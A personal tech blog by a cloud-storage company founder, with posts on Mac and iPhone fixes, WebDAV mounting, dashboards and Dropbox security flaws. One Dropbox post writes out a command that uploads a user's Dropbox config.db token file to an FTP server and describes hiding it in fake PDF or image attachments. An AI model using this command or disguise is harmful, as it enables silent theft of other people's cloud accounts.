Congratulations to Posterous for being bought by Twitter. But I admit I am quite worried about Posterous future. So I spent some minutes transferring my blog to http://blog.valerio.de/

It is now run by Tumblr. And if I ever want to transfer it to a third blog service provider the personal subdomain "blog.valerio.de" will not change anymore.

I will try to add some more posts about Apple products in general and maybe some new posts about my startup experiences. But the new posts will definitely not being published at Posterous anymore.

[Blog moved to: http://blog.valerio.de/post/19238158977/hidden-local-backups-with-mac-os-x-lion-filling-up-your ]

- You have a MacBook or MacBook Air running Mac OS X Lion?

- Ever wondered why you are loosing GB worth of hard disk space every day? 

- Using Time Machine?

 

Apple considered to implement a new "feature" to Lion that no one seems to be aware of: Local Backups if your Time Machine Drive is not connected to you computer. It seems to affect only Mac Laptops, not the desktop Macs. So every time your Time Machine backup starts without the destination drive it will copy all data in a secure folder on your local startup volume called ".MobileBackups". If you go to "About this Mac" and "More information", check the "hard disk" tab. You will find some information on how many GB are used for "Backup". In my case there were 35GB stored on my local drive. Without me even noticing.

It's great if you are travelling and accidentally deleted a document. But thsi feature takes up a lot of storage. Mayby it would be easier to wait and use the Time Machine Backup back at home?

 

Don't worry, you can still disable this "feature":

Open up the Terminal App and type

sudo tmutil disablelocal

It will take a while for the system to delete the folder. It is renamed instantly to ".MobileBackups.trash" and consequently deleted. You will notice a slower Mac and the fans could start up. But after a few minutes everything should be back to normal.

[Blog moved to: http://blog.valerio.de/post/19238158977/hidden-local-backups-with-mac-os-x-lion-filling-up-your ]

 

Well, a few weeks ago I had a look at "Onavo", a startup focussing on saving on the amount of data your iPhone will send and receive while not being on WiFi. As we all know there are a lot of reasons for this since most data plans for the iPhone are somehow restricted: Either you have to pay additional fees or your speed will be reduced until your next payment is due. And then there are outrageous high roaming fees while using your iPhone abroad.

I tried Onavo as one of the very early adopters and I realized it was not working for me! Onavo is a small App you download from the Apple App Store. The App will ask for you a short registration and send you a "profile". Basically this profile installs a proxy server configration to you existing data configuration to compress all your data. And there was the problem: I could not install this configuration. As much as I tried, I always got the message "Only one APN configuration can be installed at a time." Well, I did not have any primary APN configuration installed, so I thought this must be Onavo's fault.

Last week I found the solution! Basically, my IPhone is "jailbroken" and I had installed a few useless software gimicks like "MakeItMine" months ago. Guess what! One of these small tools installed a specific carrier settings file that would be loaded by the iPhone - instead of the regular carrier settings file! So if this file would exist the iPhone would never load the original carrier settings file. Even if the original one got changed or updated with new features. This would cause 3 problem that a lot of people had to deal with - me included: 

- No extra APN configuration (as for Onavo)

- No working push notification on the mobile network

- No "personal hotspot" settings visible

Finally, I found the solution on Onavo's support forum: 

 

1) Make sure your iPhone is jailbroken. But since this only affects jailbroken devices this should be no problem for you.

2) Install "Terminal" via Cydia and start it. Or alternatively just log into your iPhone if you have OpenSSH installed.

3) Enter this command:

rm /private/var/Managed\ Preferences/mobile/com.apple.managedCarrier.plist

4) Restart your phone

 

That's it. All problems solved. Magic!

In my case it gave me the missing "Personal Hotspot" settings, it fixed Apple push notification while not being on WiFi. And it solved my installation problems with "Onavo". What a great day :)

By the way: Since then I saved roughly 50% of my data traffic while being abroad. So I really invite you to try Onavo: http://itunes.apple.com/us/app/onavo/id423545287?mt=8

 

Well, we just updated our WebDAV server code at CloudSafe.com to make sure we cover all requirements of the WebDAV specifications.

It took a few weeks to collect all kinds of bugs people were experiencing with different WebDAV clients on different platforms. Now we made sure we are 100% compliant to the WebDAV protocol specified in RFC2518. Not a lot of commercial WebDAV storage providers comply with all WebDAV specifications.

To test WebDAV compliance there is a small little tool called "litmus" (http://www.webdav.org/neon/litmus/). It will run a bunch of commands and evaluate all results sent by the WebDAV server. You will be surprised how many online storage providers do not pass the test.

 

Now you should not have the slightest problems connecting via WebDAV to your online safes at CloudSafe. You could try this by using our free Windows Clients or our free iPhone and iPad client. Make sure you enable WebDAV for every safe you want to access.

 

 

Today I decided to upload some of our linux server backups to https://secure.cloudsafe.com/ Since CloudSafe offers free WebDAV access to all user safes I thought it would be nice to have my backup file uploaded regularly to a dedicated safe without having to interfere manually. So I wanted to share some information with you how to mount a CloudSafe safe as a regular network drive within linux.

 

Creating a safe at CloudSafe.com

 

(1) Login into CloudSafe

(2) Create a safe

(3) Go to the safe overview and enable WebDAV access

(4) Write down the credentials

 

 

Preparing your server

(1) Install davfs2 (a WebDAV file system based on FUSE):

On Ubuntu this will be one line:

apt-get install davfs2

For other linux installation guides please have a look at: http://savannah.nongnu.org/projects/davfs2

 

(2) Put the WebDAV URL, login name and login password of your Safe in a config file to automate login:

echo "(WebDAV URL)   (login name)   (login password)" >> /etc/davfs2/secrets

as an example: 

echo "https://2078622604.webdav.cloudsafe.com/   support@cloudsafe.com   BJAPQC-L6AEN4-CNRHBQ-HWVUKI" >> /etc/davfs2/secrets

 

(3) Make sure the file cache is large enough if you plan to upload big files.

echo "cache_size      100000  " >> /etc/davfs2/davfs2.conf

 

echo "use_expect100   0        " >> /etc/davfs2/davfs2.conf

 

(4) Create a Mountpoint for your safe

mkdir -p /mnt/safe

Now you are ready to mount your safe to your server's file system

Mounting the safe to your file system

 

(1) Mount your safe to /mnt/safe with a single line:

mount.davfs (WebDAV URL) /mnt/safe -o _netdev,noexec,nosuid

Use your safe's URL, as an example: 

mount.davfs https://2078622604.webdav.cloudsafe.com/ /mnt/safe -o _netdev,noexec,nosuid

Now you can copy any data between your server and your CloudSafe safe at /mnt/safe. Just remember that transferring your files to and from CloudSafe will take some time. If you upload a few GB of data this could take a few minutes of time before they show up in CloudSafe.

 

If you want to dismount the safe from you file system please use this line:

umount.davfs /mnt/safe

We are using this with multiple mountpoints as well to automatically distribute some server data to non-technical staff. So in case they need to access some of the information they do not have to rely on some tech wiz with VPN and ssh access.

 

 

 

 

I stumbled across an amazing piece of security analysis by Derek Newton concerning "DropBox". You should take a few minutes and have a look at it: "Dropbox authentication: insecure by design" http://dereknewton.com/2011/04/dropbox-authentication-static-host-ids

In general it says that once you get a one-time read access a specific file within a user folder of someone using DropBox you will always have access to this users Dropbox, even from another computer. Dropbox stores all important authentification information in a database file named "config.db" within the hidden folder "~/.dropbox". Once you get this file you can copy it to another DropBox installation and you will receive all content of the DropBox folder. Worst part: The owner will not even notice that you get an exact copy of his files. And you will get all updates as well. Even after changing the user password you will still have full access, since authentification is based on a single host key.

Basically, the owner has to de-attach his client computer from his Dropbox account. And then re-attach it. So this will be a full delete and a full restore of all his files. I know this sounds like a lot of work, but remember: Otherwise you will not even be aware if someone is getting an exact copy of all your DropBox files delivered by DropBox to a location of his choice!

 

I did some testing here in the office and I found quite a few possible ways to get to the file - since we all use Macs here I will not go into details about Windows PC - but there are similar ways to extract the one file:

 

(a) Just start a Mac with an Installation DVD. Then use the password reset utility to get access to the user account you want to compromise. After that it´s only a login and a quick copy of the file. The user will not be able to access his account and probably use the same password reset utility to get new access. But he will assume all his password are still safe since he stored them in Apple keychain (which will not be affected by the password resets).

Solution: Use "FileVault". I know it has a bad reputation, because you cannot use it in a reasonable way with Time Machine and some harddisk problems can prevent full account access. Still, your "config.db" file will be safely encrypted.

 

(b) I wrote one line to copy the DropBox config file to one of our FTP servers:

ftp -u  ftp://user:password@ourftpserver.com/config.db.backup.$RANDOM ~/.dropbox/config.db

Thats it! I did some "camouflaging" then, putting the line into different packages, like fake PDF or picture files. Apple's firewall settings do not care about traffic originating from your computer. And FTP is not blocked. As long as you start the script you are doomed.

In our testing sometimes a warning showed up mentioning to open "a program that was attached to a Mail". Well, considering this Mail comes from someone you trust or has an unsuspicious names ending in ".pdf" or ".jpg". Would you stop there? 

Solution: Install "LittleSnitch" or any other tool to monitor outgoing traffic. And make sure you take a good look at the warning messages as well. I realized that a lot of Mac users are still not used to malware at all.

 

I hope, Dropbox will change their client authentification totally. And quite soon!

I am still quite puzzled how few DropBox users realized so far how dangerous this security flaw is.

 

[Disclosure: I am MD of a company providing encrypted online storage at https://secure.cloudsafe.com/ . Although our products are quite different we may have some clients using both products. But I want to address Dropbox security issues since my main concern is security of web services in general.]

Well, I installed the Apple FaceTime 1.0 from the Mac App Store yesterday - just to find out it will not work on a german Mac OS X. Somehow the german Quality Control Department at Apple did not do their homework. The english version will work! There is an easy workaround: Delete the german localization of the FaceTime App and everything will work fine.

Nun auch einmal in Deutsch: Die deutsche Lokalisierung von Apple FaceTime 1.0 lässt FaceTime keine Gespräche aufbauen! Zur schnellen Abhilfe, einfach mal die Dateien der deutschen Lokalisierung löschen, dann funktioniert es wieder.

 

(1) FaceTime App Packetinhalt anzeigen. Dazu mit rechter Maustaste auf die FaceTime App klicken und "Packetinhalt zeigen" auswählen:

(2) Den Ordner "Resources" im Ordner "Content" öffnen:

(3) Den Ordner "Gernan.lproj" mit rechter Maustaste auswählen und "In den Papierkorb legen" auswählen:

(4) Jetzt einmal sein Anmeldepasswort eingeben.

(5) FaceTime neu starten. Jetzt ist zwar alles in Englisch, aber das Programm funktioniert wieder. Problem gelöst..

 

Ich hoffe, Apple bessert bald nach. Sollte es soweit sein, bitte die FaceTime App erst in den Papierkorb und dann neu aus dem Mac App Store herunterladen.

 

For a couple of months we were planning to implement a little dashboard to see core metrics for our startup CloudSafe (http://www.cloudsafe.com). Until now I spent quite a few minutes a day in extracting database informations and Google Analytics data and adding them together in an Excel file to get my daily statistics.

Not anymore! I automated the process in a few simple steps and by using Geckoboard (http://www.geckoboard.com):

 

1) Make sure you know which data to extract from your database. In our case I have some easy SQL statements to get key metrics from our databases. I put them in a single file "sql.txt":

 

select count(*) as Allusers from users;

select count(*) as Allusers_yesterday from users u where u.created_at < timestamptz('today') ;

etc.

 

2) Then I make sure a script gets the values:

"psql -h [database-server] -U [username] -p [port] [database] < sql.sql"

To be precise, I use this line within a ssh statement so I can run it from another machine outside the database server but within our site´s VPN:

"ssh -l [username database-server] [database-server] 'psql -h localhost -U [username] [database] < sql.sql' >> stat.txt"

The content of my database queries will be dumped into the file "stat.txt"

 

3) Then I use various "sed" commands to extract my data from the "stat.txt" file, e.g: "sed -n '5'p stat.txt >> xml.txt" to get the value on line 5 of my "stat.txt" file.

These will be converted to a valid xml format to use with Geckoboard. Easiest implementation is adding a "<?xml version="1.0" encoding="UTF-8"?> <root><item><value>" before and a "</value> <text></text> </item> <item><value> </value><text></text></item></root>" after the value you want to present.

 

4) Now I upload the data in XML format to a less secured (DMZ) site outside our productive network - within a directory that can be accessed via web.  

scp xml.txt [username dmz-server]@[dmz-server]:[path]xmlexport.txt

 

5) Then I use a custom widget within Geckoboard and use the external URL to my "xmlexport.txt" file on our DMZ server.

 

The script runs every hour and makes sure I can access reasonably new data wherever I go - without the need of established VPN and ssh connections. 

 

If you have any questions, feel free to contact me.

 

 

 

 

 

 

Well, we spent some time in the last few days to evaluate some Dropbox features. Since we will be offering a product in the area of secure cloud storage we are considering using the Dropbox API to import data from Dropbox. 

So a business friend of mine sent me a link to share a folder with me. And I found at least two security flaws within Dropbox:

 

#1:

I clicked on the link to get access to the folder. But I forgot that my wife had used Dropbox on my browser before to download a file. So the folder ended up attached to my wife´s account, not mine. Dropbox does not verify the recepient of the invitation link. So basically the first one to use the link will get access, no questions asked.

 

#2:

The business friend sent me another invitation. This time I made sure I was logged into my account.  He does not have a premium account - I do. So just for fun I clicked "Show deleted files" while having his folder in the browser window. Guess what? I could see all files he deleted from this folder. I could undelete them and then download them. I am quite sure that´s not what he intended! There were quite a lot of documentes clearly not intended for me to see.

I called him up an asked him about the files. Well, since he does not have a premium account he did not even know the files are still there! So basically I had more access rights to the folder he owned!

 

Don´t get me wrong: I love Dropbox for easy file sharing. But I would never use Dropbox to set up file sharing in a business envirmonment. There are too many mistakes one can make to get documents distributed into the wrong hands.

Well, well - this time it seems Intego was right: They just discovered one of the first malicious "trojan horse" app for Mac OSX!

These are the applications that carry the trojan:

Screensavers:

• Secret Land ScreenSaver v.2.8
• Color Therapy Clock ScreenSaver v.2.8
• 7art Foliage Clock ScreenSaver v.2.8
• Nature Harmony Clock ScreenSaver v.2.8
• Fiesta Clock ScreenSaver v.2.8
• Fractal Sun Clock ScreenSaver v.2.8
• Full Moon Clock ScreenSaver v.2.8
• Sky Flight Clock ScreenSaver v.2.8
• Sunny Bubbles Clock ScreenSaver v.2.9
• Everlasting Flowering Clock ScreenSaver v.2.8
• Magic Forest Clock ScreenSaver v.2.8
• Freezelight Clock ScreenSaver v.2.9
• Precious Stone Clock ScreenSaver v.2.8
• Silver Snow Clock ScreenSaver v.2.8
• Water Color Clock ScreenSaver v.2.8
• Love Dance Clock ScreenSaver v.2.8
• Galaxy Rhythm Clock ScreenSaver v.2.8
• 7art Eternal Love Clock ScreenSaver v.2.8
• Fire Element Clock ScreenSaver v.2.8
• Water Element Clock ScreenSaver v.2.8
• Emerald Clock ScreenSaver v.2.8
• Radiating Clock ScreenSaver v.2.8
• Rocket Clock ScreenSaver v.2.8
• Serenity Clock ScreenSaver v.2.8
• Gravity Free Clock ScreenSaver v.2.8
• Crystal Clock ScreenSaver v.2.6
• One World Clock ScreenSaver v.2.8
• Sky Watch ScreenSaver v.2.8
• Lighthouse Clock ScreenSaver v.2.8

Application

• MishInc FLV To Mp3, http://www.mishinc.info/mac_flv_to_mp3.php

The screensavers are made by only one company: 7art-screensavers (http://7art-screensavers.com)

 

I checked the owner of "7art-screensavers.com" and found:

Alex Korsakoff and Roman Rusavsky; P.O.Box 464; 111555; Moscow; Russia

 

Most times Intego had a press release about some "dangerous" application on Mac I considered their information highly dramatized to push their VirusBarrier product.

But this time I have to admit I see a point in getting some Antivirus protection for my Mac. ...just not VirusBarrier since I had a dozen kernel panics using it in February. I hope they did some serious bugfixing by now.

Read their blog entry here: http://blog.intego.com/2010/06/01/preliminary-list-of-applications-that-insta...